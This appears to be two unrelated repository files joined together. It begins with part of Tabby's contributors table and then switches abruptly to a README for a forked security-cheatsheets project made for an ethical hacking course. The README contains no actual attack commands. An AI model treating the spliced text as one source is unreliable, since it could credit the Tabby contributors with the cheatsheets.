src="https://avatars.githubusercontent.com/u/34997494?v=4?s=100" width="100px;" alt="starxg"/><br /><sub><b>starxg</b></sub></a><br /><a href="#plugin-starxg" title="Plugin/utility libraries">🔌</a></td> <td align="center" valign="top" width="14.28%"><a href="http://hashnote.net/"><img src="https://avatars.githubusercontent.com/u/546312?v=4?s=100" width="100px;" alt="Alisue"/><br /><sub><b>Alisue</b></sub></a><br /><a href="#design-lambdalisue" title="Design">🎨</a></td> </tr> <tr> <td align="center" valign="top" width="14.28%"><a href="https://github.com/ydcool"><img src="https://avatars.githubusercontent.com/u/5668295?v=4?s=100" width="100px;" alt="Dominic Yin"/><br /><sub><b>Dominic Yin</b></sub></a><br /><a href="https://github.com/Eugeny/tabby/commits?author=ydcool" title="Code">💻</a></td> <td align="center" valign="top" width="14.28%"><a href="https://github.com/bdr99"><img src="https://avatars.githubusercontent.com/u/2292715?v=4?s=100" width="100px;" alt="Brandon Rothweiler"/><br /><sub><b>Brandon Rothweiler</b></sub></a><br /><a href="#design-bdr99" title="Design">🎨</a></td> <td align="center" valign="top" width="14.28%"><a href="https://git.io/JnP49"><img src="https://avatars.githubusercontent.com/u/63876444?v=4?s=100" width="100px;" alt="Logic Machine"/><br /><sub><b>Logic Machine</b></sub></a><br /><a href="https://github.com/Eugeny/tabby/commits?author=logicmachine123" title="Documentation">📖</a></td> <td align="center" valign="top" width="14.28%"><a href="https://github.com/cypherbits"><img src="https://avatars.githubusercontent.com/u/10424900?v=4?s=100" width="100px;" alt="cypherbits"/><br /><sub><b>cypherbits</b></sub></a><br /><a href="https://github.com/Eugeny/tabby/commits?author=cypherbits" title="Documentation">📖</a></td> <td align="center" valign="top" width="14.28%"><a href="https://modulolotus.net"><img src="https://avatars.githubusercontent.com/u/946421?v=4?s=100" width="100px;" alt="Matthew Davidson"/><br /><sub><b>Matthew Davidson</b></sub></a><br /><a href="https://github.com/Eugeny/tabby/commits?author=KingMob" title="Code">💻</a></td> <td align="center" valign="top" width="14.28%"><a href="https://github.com/al-wi"><img src="https://avatars.githubusercontent.com/u/11092199?v=4?s=100" width="100px;" alt="Alexander Wiedemann"/><br /><sub><b>Alexander Wiedemann</b></sub></a><br /><a href="https://github.com/Eugeny/tabby/commits?author=al-wi" title="Code">💻</a></td> <td align="center" valign="top" width="14.28%"><a href="https://www.notion.so/3d45c6bd2cbd4f938873a4bd12e23375"><img src="https://avatars.githubusercontent.com/u/59506394?v=4?s=100" width="100px;" alt="장보연"/><br /><sub><b>장보연</b></sub></a><br /><a href="https://github.com/Eugeny/tabby/commits?author=BoYeonJang" title="Documentation">📖</a></td> </tr> <tr> <td align="center" valign="top" width="14.28%"><a href="https://github.com/Me1onRind"><img src="https://avatars.githubusercontent.com/u/19531270?v=4?s=100" width="100px;" alt="zZ"/><br /><sub><b>zZ</b></sub></a><br /><a href="https://github.com/Eugeny/tabby/commits?author=Me1onRind" title="Code">💻</a></td> <td align="center" valign="top" width="14.28%"><a href="https://github.com/tainoNZ"><img src="https://avatars.githubusercontent.com/u/49261322?v=4?s=100" width="100px;" alt="Aaron Davison"/><br /><sub><b>Aaron Davison</b></sub></a><br /><a href="https://github.com/Eugeny/tabby/commits?author=tainoNZ" title="Code">💻</a></td> <td align="center" valign="top" width="14.28%"><a href="https://github.com/composer404"><img src="https://avatars.githubusercontent.com/u/58251560?v=4?s=100" width="100px;" alt="Przemyslaw Kozik"/><br /><sub><b>Przemyslaw Kozik</b></sub></a><br /><a href="#design-composer404" title="Design">🎨</a></td> <td align="center" valign="top" width="14.28%"><a href="https://github.com/highfredo"><img src="https://avatars.githubusercontent.com/u/5951524?v=4?s=100" width="100px;" alt="Alfredo Arellano de la Fuente"/><br /><sub><b>Alfredo Arellano de la Fuente</b></sub></a><br /><a href="https://github.com/Eugeny/tabby/commits?author=highfredo" title="Code">💻</a></td> <td align="center" valign="top" width="14.28%"><a href="https://github.com/NessunKim"><img src="https://avatars.githubusercontent.com/u/12974079?v=4?s=100" width="100px;" alt="MH Kim"/><br /><sub><b>MH Kim</b></sub></a><br /><a href="https://github.com/Eugeny/tabby/commits?author=NessunKim" title="Code">💻</a></td> <td align="center" valign="top" width="14.28%"><a href="https://discord.gg/4c5EVTBhtp"><img src="https://avatars.githubusercontent.com/u/40345645?v=4?s=100" width="100px;" alt="Marmota"/><br /><sub><b>Marmota</b></sub></a><br /><a href="#design-jaimeadf" title="Design">🎨</a></td> <td align="center" valign="top" width="14.28%"><a href="https://ares.zone"><img src="https://avatars.githubusercontent.com/u/40336192?v=4?s=100" width="100px;" alt="Ares Andrew"/><br /><sub><b>Ares Andrew</b></sub></a><br /><a href="https://github.com/Eugeny/tabby/commits?author=TENX-S" title="Documentation">📖</a></td> </tr> <tr> <td align="center" valign="top" width="14.28%"><a href="https://usual.io/"><img src="https://avatars.githubusercontent.com/u/780052?v=4?s=100" width="100px;" alt="George Korsnick"/><br /><sub><b>George Korsnick</b></sub></a><br /><a href="#financial-gkor" title="Financial">💵</a></td> <td align="center" valign="top" width="14.28%"><a href="https://about.me/ulu"><img src="https://avatars.githubusercontent.com/u/872764?v=4?s=100" width="100px;" alt="Artem Smirnov"/><br /><sub><b>Artem Smirnov</b></sub></a><br /><a href="#financial-uluhonolulu" title="Financial">💵</a></td> <td align="center" valign="top" width="14.28%"><a href="https://github.com/nevotheless"><img src="https://avatars.githubusercontent.com/u/779797?v=4?s=100" width="100px;" alt="Tim Kopplow"/><br /><sub><b>Tim Kopplow</b></sub></a><br /><a href="#financial-nevotheless" title="Financial">💵</a></td> <td align="center" valign="top" width="14.28%"><a href="https://github.com/mrthock"><img src="https://avatars.githubusercontent.com/u/88901709?v=4?s=100" width="100px;" alt="mrthock"/><br /><sub><b>mrthock</b></sub></a><br /><a href="#financial-mrthock" title="Financial">💵</a></td> <td align="center" valign="top" width="14.28%"><a href="https://github.com/lrottach"><img src="https://avatars.githubusercontent.com/u/50323692?v=4?s=100" width="100px;" alt="Lukas Rottach"/><br /><sub><b>Lukas Rottach</b></sub></a><br /><a href="#financial-lrottach" title="Financial">💵</a></td> <td align="center" valign="top" width="14.28%"><a href="https://github.com/boonkerz"><img src="https://avatars.githubusercontent.com/u/277321?v=4?s=100" width="100px;" alt="boonkerz"/><br /><sub><b>boonkerz</b></sub></a><br /><a href="https://github.com/Eugeny/tabby/commits?author=boonkerz" title="Code">💻</a> <a href="#translation-boonkerz" title="Translation">🌍</a></td> <td align="center" valign="top" width="14.28%"><a href="https://github.com/milotype"><img src="https://avatars.githubusercontent.com/u/43657314?v=4?s=100" width="100px;" alt="Milo Ivir"/><br /><sub><b>Milo Ivir</b></sub></a><br /><a href="#translation-milotype" title="Translation">🌍</a></td> </tr> <tr> <td align="center" valign="top" width="14.28%"><a href="https://github.com/JasonCubic"><img src="https://avatars.githubusercontent.com/u/8921015?v=4?s=100" width="100px;" alt="JasonCubic"/><br /><sub><b>JasonCubic</b></sub></a><br /><a href="#design-JasonCubic" title="Design">🎨</a></td> <td align="center" valign="top" width="14.28%"><a href="https://github.com/MaxWaldorf"><img src="https://avatars.githubusercontent.com/u/15877853?v=4?s=100" width="100px;" alt="MaxWaldorf"/><br /><sub><b>MaxWaldorf</b></sub></a><br /><a href="#infra-MaxWaldorf" title="Infrastructure (Hosting, Build-Tools, etc)">🚇</a></td> <td align="center" valign="top" width="14.28%"><a href="https://github.com/mwz"><img src="https://avatars.githubusercontent.com/u/1190768?v=4?s=100" width="100px;" alt="Michael Wizner"/><br /><sub><b>Michael Wizner</b></sub></a><br /><a href="https://github.com/Eugeny/tabby/commits?author=mwz" title="Code">💻</a></td> <td align="center" valign="top" width="14.28%"><a href="https://github.com/mgrulich"><img src="https://avatars.githubusercontent.com/u/781036?v=4?s=100" width="100px;" alt="Martin"/><br /><sub><b>Martin</b></sub></a><br /><a href="https://github.com/Eugeny/tabby/commits?author=mgrulich" title="Code">💻</a></td> <td align="center" valign="top" width="14.28%"><a href="https://github.com/piersandro"><img src="https://avatars.githubusercontent.com/u/19996309?v=4?s=100" width="100px;" alt="Piersandro Guerrera"/><br /><sub><b>Piersandro Guerrera</b></sub></a><br /><a href="https://github.com/Eugeny/tabby/commits?author=piersandro" title="Documentation">📖</a> <a href="#translation-piersandro" title="Translation">🌍</a></td> <td align="center" valign="top" width="14.28%"><a href="http://pingbase.cn"><img src="https://avatars.githubusercontent.com/u/19320096?v=4?s=100" width="100px;" alt="X-0x01"/><br /><sub><b>X-0x01</b></sub></a><br /><a href="https://github.com/Eugeny/tabby/commits?author=X-0x01" title="Code">💻</a></td> <td align="center" valign="top" width="14.28%"><a href="https://github.com/Allenator"><img src="https://avatars.githubusercontent.com/u/11794943?v=4?s=100" width="100px;" alt="Allenator"/><br /><sub><b>Allenator</b></sub></a><br /><a href="https://github.com/Eugeny/tabby/commits?author=Allenator" title="Documentation">📖</a></td> </tr> <tr> <td align="center" valign="top" width="14.28%"><a href="http://microhobby.com.br/blog"><img src="https://avatars.githubusercontent.com/u/2633321?v=4?s=100" width="100px;" alt="Matheus Castello"/><br /><sub><b>Matheus Castello</b></sub></a><br /><a href="https://github.com/Eugeny/tabby/commits?author=microhobby" title="Code">💻</a></td> <td align="center" valign="top" width="14.28%"><a href="https://github.com/Jai-JAP"><img src="https://avatars.githubusercontent.com/u/78354625?v=4?s=100" width="100px;" alt="Jai A P"/><br /><sub><b>Jai A P</b></sub></a><br /><a href="#platform-Jai-JAP" title="Packaging/porting to new platform">📦</a></td> <td align="center" valign="top" width="14.28%"><a href="https://blog.ysc3839.com"><img src="https://avatars.githubusercontent.com/u/12028138?v=4?s=100" width="100px;" alt="Richard Yu"/><br /><sub><b>Richard Yu</b></sub></a><br /><a href="https://github.com/Eugeny/tabby/commits?author=ysc3839" title="Code">💻</a></td> <td align="center" valign="top" width="14.28%"><a href="https://github.com/artu-ole"><img src="https://avatars.githubusercontent.com/u/15938416?v=4?s=100" width="100px;" alt="artu-ole"/><br /><sub><b>artu-ole</b></sub></a><br /><a href="https://github.com/Eugeny/tabby/commits?author=artu-ole" title="Code">💻</a></td> <td align="center" valign="top" width="14.28%"><a href="https://timagribanov.github.io/"><img src="https://avatars.githubusercontent.com/u/48593815?v=4?s=100" width="100px;" alt="Timofey Gribanov"/><br /><sub><b>Timofey Gribanov</b></sub></a><br /><a href="https://github.com/Eugeny/tabby/commits?author=TimaGribanov" title="Documentation">📖</a> <a href="#translation-TimaGribanov" title="Translation">🌍</a></td> <td align="center" valign="top" width="14.28%"><a href="https://git.christianbingman.com"><img src="https://avatars.githubusercontent.com/u/42191425?v=4?s=100" width="100px;" alt="Christian Bingman"/><br /><sub><b>Christian Bingman</b></sub></a><br /><a href="https://github.com/Eugeny/tabby/commits?author=ChristianBingman" title="Code">💻</a></td> <td align="center" valign="top" width="14.28%"><a href="http://zhangzhipeng2023.cn/"><img src="https://avatars.githubusercontent.com/u/5310853?v=4?s=100" width="100px;" alt="zhipeng"/><br /><sub><b>zhipeng</b></sub></a><br /><a href="https://github.com/Eugeny/tabby/commits?author=Ox0400" title="Code">💻</a></td> </tr> <tr> <td align="center" valign="top" width="14.28%"><a href="https://github.com/woodmeal"><img src="https://avatars.githubusercontent.com/u/104011197?v=4?s=100" width="100px;" alt="woodmeal"/><br /><sub><b>woodmeal</b></sub></a><br /><a href="https://github.com/Eugeny/tabby/commits?author=woodmeal" title="Code">💻</a></td> <td align="center" valign="top" width="14.28%"><a href="https://magiclike.codeberg.page/"><img src="https://avatars.githubusercontent.com/u/82117109?v=4?s=100" width="100px;" alt="MagicLike"/><br /><sub><b>MagicLike</b></sub></a><br /><a href="https://github.com/Eugeny/tabby/commits?author=MagicLike" title="Documentation">📖</a></td> <td align="center" valign="top" width="14.28%"><a href="https://github.com/hisamafahri"><img src="https://avatars.githubusercontent.com/u/65691613?v=4?s=100" width="100px;" alt="Hisam Fahri"/><br /><sub><b>Hisam Fahri</b></sub></a><br /><a href="https://github.com/Eugeny/tabby/commits?author=hisamafahri" title="Code">💻</a></td> <td align="center" valign="top" width="14.28%"><a href="https://liangchengj.com"><img src="https://avatars.githubusercontent.com/u/48881023?v=4?s=100" width="100px;" alt="Liangcheng Juves"/><br /><sub><b>Liangcheng Juves</b></sub></a><br /><a href="https://github.com/Eugeny/tabby/commits?author=LiangchengJ" title="Code">💻</a></td> <td align="center" valign="top" width="14.28%"><a href="https://github.com/attet"><img src="https://avatars.githubusercontent.com/u/1911416?v=4?s=100" width="100px;" alt="Atte Timonen"/><br /><sub><b>Atte Timonen</b></sub></a><br /><a href="https://github.com/Eugeny/tabby/commits?author=attet" title="Code">💻</a></td> <td align="center" valign="top" width="14.28%"><a href="https://www.linkedin.com/in/joaolmpinto/"><img src="https://avatars.githubusercontent.com/u/1143125?v=4?s=100" width="100px;" alt="João Pinto"/><br /><sub><b>João Pinto</b></sub></a><br /><a href="https://github.com/Eugeny/tabby/commits?author=joaompinto" title="Documentation">📖</a></td> <td align="center" valign="top" width="14.28%"><a href="https://github.com/Qiming-Liu"><img src="https://avatars.githubusercontent.com/u/68600416?v=4?s=100" width="100px;" alt="Alan"/><br /><sub><b>Alan</b></sub></a><br /><a href="https://github.com/Eugeny/tabby/commits?author=Qiming-Liu" title="Code">💻</a></td> </tr> <tr> <td align="center" valign="top" width="14.28%"><a href="https://74th.tech/"><img src="https://avatars.githubusercontent.com/u/1060011?v=4?s=100" width="100px;" alt="Atsushi Morimoto"/><br /><sub><b>Atsushi Morimoto</b></sub></a><br /><a href="#financial-74th" title="Financial">💵</a></td> <td align="center" valign="top" width="14.28%"><a href="https://arles.red/"><img src="https://avatars.githubusercontent.com/u/5369096?v=4?s=100" width="100px;" alt="Arles"/><br /><sub><b>Arles</b></sub></a><br /><a href="#financial-aarles" title="Financial">💵</a></td> <td align="center" valign="top" width="14.28%"><a href="https://pentestbook.six2dez.com/"><img src="https://avatars.githubusercontent.com/u/24670991?v=4?s=100" width="100px;" alt="six2dez"/><br /><sub><b>six2dez</b></sub></a><br /><a href="#financial-six2dez" title="Financial">💵</a></td> <td align="center" valign="top" width="14.28%"><a href="https://github.com/CandiceJoy"><img src="https://avatars.githubusercontent.com/u/8854890?v=4?s=100" width="100px;" alt="Candice"/><br /><sub><b>Candice</b></sub></a><br /><a href="#financial-CandiceJoy" title="Financial">💵</a></td> <td align="center" valign="top" width="14.28%"><a href="https://github.com/kingrowen"><img src="https://avatars.githubusercontent.com/u/13178700?v=4?s=100" width="100px;" alt="Rowen Willabus"/><br /><sub><b>Rowen Willabus</b></sub></a><br /><a href="#financial-kingrowen" title="Financial">💵</a></td> <td align="center" valign="top" width="14.28%"><a href="https://hengy1.top/"><img src="https://avatars.githubusercontent.com/u/98681454?v=4?s=100" width="100px;" alt="HengY1Coding✨"/><br /><sub><b>HengY1Coding✨</b></sub></a><br /><a href="#financial-HengY1Sky" title="Financial">💵</a></td> <td align="center" valign="top" width="14.28%"><a href="https://github.com/FrancisHG"><img src="https://avatars.githubusercontent.com/u/1611626?v=4?s=100" width="100px;" alt="Francis Gelderloos"/><br /><sub><b>Francis Gelderloos</b></sub></a><br /><a href="#financial-FrancisHG" title="Financial">💵</a></td> </tr> <tr> <td align="center" valign="top" width="14.28%"><a href="https://github.com/astromasoud"><img src="https://avatars.githubusercontent.com/u/18737721?v=4?s=100" width="100px;" alt="astromasoud"/><br /><sub><b>astromasoud</b></sub></a><br /><a href="#financial-astromasoud" title="Financial">💵</a></td> <td align="center" valign="top" width="14.28%"><a href="https://spirit55555.dk/"><img src="https://avatars.githubusercontent.com/u/2357565?v=4?s=100" width="100px;" alt="Anders G. Jørgensen"/><br /><sub><b>Anders G. Jørgensen</b></sub></a><br /><a href="#financial-Spirit55555" title="Financial">💵</a></td> <td align="center" valign="top" width="14.28%"><a href="https://github.com/djradon"><img src="https://avatars.githubusercontent.com/u/5224156?v=4?s=100" width="100px;" alt="Dave Richardson"/><br /><sub><b>Dave Richardson</b></sub></a><br /><a href="#financial-djradon" title="Financial">💵</a></td> <td align="center" valign="top" width="14.28%"><a href="https://twitter.com/tpberntsen"><img src="https://avatars.githubusercontent.com/u/922318?v=4?s=100" width="100px;" alt="Thomas Peter Berntsen"/><br /><sub><b>Thomas Peter Berntsen</b></sub></a><br /><a href="#financial-tpberntsen" title="Financial">💵</a></td> <td align="center" valign="top" width="14.28%"><a href="https://bandism.net/"><img src="https://avatars.githubusercontent.com/u/22633385?v=4?s=100" width="100px;" alt="Ikko Ashimine"/><br /><sub><b>Ikko Ashimine</b></sub></a><br /><a href="https://github.com/Eugeny/tabby/commits?author=eltociear" title="Documentation">📖</a></td> <td align="center" valign="top" width="14.28%"><a href="https://github.com/giejqf"><img src="https://avatars.githubusercontent.com/u/9211230?v=4?s=100" width="100px;" alt="giejqf"/><br /><sub><b>giejqf</b></sub></a><br /><a href="https://github.com/Eugeny/tabby/commits?author=giejqf" title="Code">💻</a></td> <td align="center" valign="top" width="14.28%"><a href="https://github.com/LacazeThomas"><img src="https://avatars.githubusercontent.com/u/19855907?v=4?s=100" width="100px;" alt="Thomas LACAZE"/><br /><sub><b>Thomas LACAZE</b></sub></a><br /><a href="https://github.com/Eugeny/tabby/commits?author=LacazeThomas" title="Code">💻</a></td> </tr> <tr> <td align="center" valign="top" width="14.28%"><a href="https://pochen.me/"><img src="https://avatars.githubusercontent.com/u/1329716?v=4?s=100" width="100px;" alt="Po Chen"/><br /><sub><b>Po Chen</b></sub></a><br /><a href="#financial-princemaple" title="Financial">💵</a></td> <td align="center" valign="top" width="14.28%"><a href="https://victorchandra.carrd.co/"><img src="https://avatars.githubusercontent.com/u/41635105?v=4?s=100" width="100px;" alt="Victor Chandra"/><br /><sub><b>Victor Chandra</b></sub></a><br /><a href="https://github.com/Eugeny/tabby/commits?author=mzmznasipadang" title="Documentation">📖</a></td> <td align="center" valign="top" width="14.28%"><a href="https://github.com/daniel347x"><img src="https://avatars.githubusercontent.com/u/309746?v=4?s=100" width="100px;" alt="Dan Nissenbaum"/><br /><sub><b>Dan Nissenbaum</b></sub></a><br /><a href="#financial-daniel347x" title="Financial">💵</a></td> <td align="center" valign="top" width="14.28%"><a href="https://github.com/DunklerPhoenix"><img src="https://avatars.githubusercontent.com/u/1261305?v=4?s=100" width="100px;" alt="RogueThorn"/><br /><sub><b>RogueThorn</b></sub></a><br /><a href="#financial-DunklerPhoenix" title="Financial">💵</a></td> <td align="center" valign="top" width="14.28%"><a href="http://spenserblack.github.io"><img src="https://avatars.githubusercontent.com/u/8546709?v=4?s=100" width="100px;" alt="Spenser Black"/><br /><sub><b>Spenser Black</b></sub></a><br /><a href="https://github.com/Eugeny/tabby/commits?author=spenserblack" title="Code">💻</a></td> <td align="center" valign="top" width="14.28%"><a href="https://github.com/zuedev"><img src="https://avatars.githubusercontent.com/u/24614929?v=4?s=100" width="100px;" alt="Alex"/><br /><sub><b>Alex</b></sub></a><br /><a href="#financial-zuedev" title="Financial">💵</a></td> <td align="center" valign="top" width="14.28%"><a href="https://hengy1.top/"><img src="https://avatars.githubusercontent.com/u/98681454?v=4?s=100" width="100px;" alt="HengY1Coding✨"/><br /><sub><b>HengY1Coding✨</b></sub></a><br /><a href="#financial-HengY1Cola" title="Financial">💵</a></td> </tr> <tr> <td align="center" valign="top" width="14.28%"><a href="https://www.stackscale.com/"><img src="https://avatars.githubusercontent.com/u/195768?v=4?s=100" width="100px;" alt="David Carrero"/><br /><sub><b>David Carrero</b></sub></a><br /><a href="https://github.com/Eugeny/tabby/commits?author=dcarrero" title="Documentation">📖</a></td> <td align="center" valign="top" width="14.28%"><a href="https://github.com/zhoro"><img src="https://avatars.githubusercontent.com/u/1105687?v=4?s=100" width="100px;" alt="Andrii Zhovtiak"/><br /><sub><b>Andrii Zhovtiak</b></sub></a><br /><a href="https://github.com/Eugeny/tabby/commits?author=zhoro" title="Code">💻</a></td> <td align="center" valign="top" width="14.28%"><a href="https://github.com/JohnMasoner"><img src="https://avatars.githubusercontent.com/u/42313377?v=4?s=100" width="100px;" alt="Mason Ma"/><br /><sub><b>Mason Ma</b></sub></a><br /><a href="#financial-JohnMasoner" title="Financial">💵</a></td> <td align="center" valign="top" width="14.28%"><a href="https://github.com/ntimo"><img src="https://avatars.githubusercontent.com/u/6145026?v=4?s=100" width="100px;" alt="Timo"/><br /><sub><b>Timo</b></sub></a><br /><a href="#financial-ntimo" title="Financial">💵</a></td> <td align="center" valign="top" width="14.28%"><a href="https://www.linkedin.com/in/evinwatson/"><img src="https://avatars.githubusercontent.com/u/24227251?v=4?s=100" width="100px;" alt="Evin Watson"/><br /><sub><b>Evin Watson</b></sub></a><br /><a href="https://github.com/Eugeny/tabby/commits?author=EvinRWatson" title="Documentation">📖</a></td> <td align="center" valign="top" width="14.28%"><a href="https://t.me/hendrjl"><img src="https://avatars.githubusercontent.com/u/15981200?v=4?s=100" width="100px;" alt="Hendra Juli"/><br /><sub><b>Hendra Juli</b></sub></a><br /><a href="https://github.com/Eugeny/tabby/commits?author=deulizealand" title="Documentation">📖</a></td> <td align="center" valign="top" width="14.28%"><a href="https://github.com/wkricowski"><img src="https://avatars.githubusercontent.com/u/36803521?v=4?s=100" width="100px;" alt="Wellinton Kricowski"/><br /><sub><b>Wellinton Kricowski</b></sub></a><br /><a href="#financial-wkricowski" title="Financial">💵</a> <a href="https://github.com/Eugeny/tabby/commits?author=wkricowski" title="Documentation">📖</a></td> </tr> <tr> <td align="center" valign="top" width="14.28%"><a href="https://github.com/almzau"><img src="https://avatars.githubusercontent.com/u/29115846?v=4?s=100" width="100px;" alt="Allan"/><br /><sub><b>Allan</b></sub></a><br /><a href="#design-almzau" title="Design">🎨</a></td> <td align="center" valign="top" width="14.28%"><a href="https://oidamo.de"><img src="https://avatars.githubusercontent.com/u/17959794?v=4?s=100" width="100px;" alt="Benjamin Brandmeier"/><br /><sub><b>Benjamin Brandmeier</b></sub></a><br /><a href="https://github.com/Eugeny/tabby/commits?author=BenjaminBrandmeier" title="Code">💻</a></td> <td align="center" valign="top" width="14.28%"><a href="https://github.com/patric1025"><img src="https://avatars.githubusercontent.com/u/65654040?v=4?s=100" width="100px;" alt="patric1025"/><br /><sub><b>patric1025</b></sub></a><br /><a href="#translation-patric1025" title="Translation">🌍</a></td> <td align="center" valign="top" width="14.28%"><a href="https://github.com/hermitpopcorn"><img src="https://avatars.githubusercontent.com/u/16042129?v=4?s=100" width="100px;" alt="hermitpopcorn"/><br /><sub><b>hermitpopcorn</b></sub></a><br /><a href="https://github.com/Eugeny/tabby/commits?author=hermitpopcorn" title="Code">💻</a></td> <td align="center" valign="top" width="14.28%"><a href="https://joshuatz.com/"><img src="https://avatars.githubusercontent.com/u/17817563?v=4?s=100" width="100px;" alt="Joshua Tzucker"/><br /><sub><b>Joshua Tzucker</b></sub></a><br /><a href="#financial-joshuatz" title="Financial">💵</a></td> <td align="center" valign="top" width="14.28%"><a href="https://github.com/luxifr"><img src="https://avatars.githubusercontent.com/u/665715?v=4?s=100" width="100px;" alt="luxifr"/><br /><sub><b>luxifr</b></sub></a><br /><a href="#financial-luxifr" title="Financial">💵</a></td> <td align="center" valign="top" width="14.28%"><a href="https://github.com/ukulanne"><img src="https://avatars.githubusercontent.com/u/28586666?v=4?s=100" width="100px;" alt="Anne Summers"/><br /><sub><b>Anne Summers</b></sub></a><br /><a href="#financial-ukulanne" title="Financial">💵</a></td> </tr> <tr> <td align="center" valign="top" width="14.28%"><a href="https://github.com/Clem-Fern"><img src="https://avatars.githubusercontent.com/u/20025949?v=4?s=100" width="100px;" alt="Clem"/><br /><sub><b>Clem</b></sub></a><br /><a href="https://github.com/Eugeny/tabby/commits?author=Clem-Fern" title="Code">💻</a></td> <td align="center" valign="top" width="14.28%"><a href="https://github.com/elizabeth-dev"><img src="https://avatars.githubusercontent.com/u/13015727?v=4?s=100" width="100px;" alt="Elizabeth Martín Campos"/><br /><sub><b>Elizabeth Martín Campos</b></sub></a><br /><a href="https://github.com/Eugeny/tabby/commits?author=elizabeth-dev" title="Code">💻</a></td> <td align="center" valign="top" width="14.28%"><a href="https://github.com/siccous"><img src="https://avatars.githubusercontent.com/u/7812885?v=4?s=100" width="100px;" alt="Tomáš Hruška"/><br /><sub><b>Tomáš Hruška</b></sub></a><br /><a href="https://github.com/Eugeny/tabby/commits?author=siccous" title="Code">💻</a></td> <td align="center" valign="top" width="14.28%"><a href="https://github.com/karaketir16"><img src="https://avatars.githubusercontent.com/u/27349806?v=4?s=100" width="100px;" alt="Osman Karaketir"/><br /><sub><b>Osman Karaketir</b></sub></a><br /><a href="https://github.com/Eugeny/tabby/commits?author=karaketir16" title="Code">💻</a></td> <td align="center" valign="top" width="14.28%"><a href="https://www.gnomegarden.io/"><img src="https://avatars.githubusercontent.com/u/33667144?v=4?s=100" width="100px;" alt="Crypto Gnome"/><br /><sub><b>Crypto Gnome</b></sub></a><br /><a href="#financial-CryptoGnome" title="Financial">💵</a></td> <td align="center" valign="top" width="14.28%"><a href="https://github.com/rbukovansky"><img src="https://avatars.githubusercontent.com/u/1004491?v=4?s=100" width="100px;" alt="Richard Bukovansky"/><br /><sub><b>Richard Bukovansky</b></sub></a><br /><a href="#financial-rbukovansky" title="Financial">💵</a></td> <td align="center" valign="top" width="14.28%"><a href="https://github.com/pseudocc"><img src="https://avatars.githubusercontent.com/u/85104110?v=4?s=100" width="100px;" alt="catlas"/><br /><sub><b>catlas</b></sub></a><br /><a href="#financial-pseudocc" title="Financial">💵</a></td> </tr> <tr> <td align="center" valign="top" width="14.28%"><a href="http://kapocsi.ca"><img src="https://avatars.githubusercontent.com/u/84490604?v=4?s=100" width="100px;" alt="Thomas Kapocsi"/><br /><sub><b>Thomas Kapocsi</b></sub></a><br /><a href="https://github.com/Eugeny/tabby/commits?author=Kapocsi" title="Documentation">📖</a></td> <td align="center" valign="top" width="14.28%"><a href="https://dylhack.dev/"><img src="https://avatars.githubusercontent.com/u/27179786?v=4?s=100" width="100px;" alt="Dylan Hackworth"/><br /><sub><b>Dylan Hackworth</b></sub></a><br /><a href="#financial-dylhack" title="Financial">💵</a></td> <td align="center" valign="top" width="14.28%"><a href="https://github.com/echo304"><img src="https://avatars.githubusercontent.com/u/16456651?v=4?s=100" width="100px;" alt="Sangboak Lee"/><br /><sub><b>Sangboak Lee</b></sub></a><br /><a href="https://github.com/Eugeny/tabby/commits?author=echo304" title="Code">💻</a></td> <td align="center" valign="top" width="14.28%"><a href="https://github.com/qyecst"><img src="https://avatars.githubusercontent.com/u/13901864?v=4?s=100" width="100px;" alt="qyecst"/><br /><sub><b>qyecst</b></sub></a><br /><a href="https://github.com/Eugeny/tabby/commits?author=qyecst" title="Code">💻</a></td> <td align="center" valign="top" width="14.28%"><a href="https://github.com/DehanLUO"><img src="https://avatars.githubusercontent.com/u/53093688?v=4?s=100" width="100px;" alt="Han"/><br /><sub><b>Han</b></sub></a><br /><a href="https://github.com/Eugeny/tabby/commits?author=DehanLUO" title="Code">💻</a></td> <td align="center" valign="top" width="14.28%"><a href="https://github.com/wljince007"><img src="https://avatars.githubusercontent.com/u/88243938?v=4?s=100" width="100px;" alt="wljince007"/><br /><sub><b>wljince007</b></sub></a><br /><a href="https://github.com/Eugeny/tabby/commits?author=wljince007" title="Code">💻</a></td> <td align="center" valign="top" width="14.28%"><a href="https://github.com/FeroTheFox"><img src="https://avatars.githubusercontent.com/u/52982404?v=4?s=100" width="100px;" alt="fero"/><br /><sub><b>fero</b></sub></a><br /><a href="https://github.com/Eugeny/tabby/commits?author=FeroTheFox" title="Code">💻</a></td> </tr> </tbody> </table> <!-- markdownlint-restore --> <!-- prettier-ignore-end --> <!-- ALL-CONTRIBUTORS-LIST:END --> This project follows the [all-contributors](https://github.com/all-contributors/all-contributors) specification. Contributions of any kind are welcome!
NOTE ==== [Andrwjkerr](https://github.com/andrewjkerr/security-cheatsheets) forked repository for [www.sniferl4bs.com](www.sniferl4bs.com) The fork was done because the original author has not updated about 2 years ago. Security Cheatsheets ==================== These security cheatsheets are part of a project for the Ethical Hacking and Penetration Testing course offered at the University of Florida. Expanding on the default set of cheatsheets, the purpose of these cheatsheets are to aid penetration testers/CTF participants/security enthusiasts in remembering commands that are useful, but not frequently used. Most of the tools that will be covered have been included in our class and are available in [Kali Linux](http://www.kali.org). Requirements ------------ The only requirement to use these cheatsheets is for [cheat](https://github.com/chrisallenlane/cheat) to be installed. How to Use ---------- In order to use these cheatsheets, the cheatsheets in this repository need to go into `~/.cheat/` directory. After the files are moved into that directory, `cheat ncat` will display the ncat cheatsheet. Contributors ============ Jose Moruno Cadima aka Snifer [TWITTER](https://twitter.com/sniferl4bs) [BLOG](http://www.sniferl4bs.com) Resources ========= Metasploit Cheat Sheet [Sans Institute](http://www.sans.org/security-resources/sec560/misc_tools_sheet_v1.pdf)
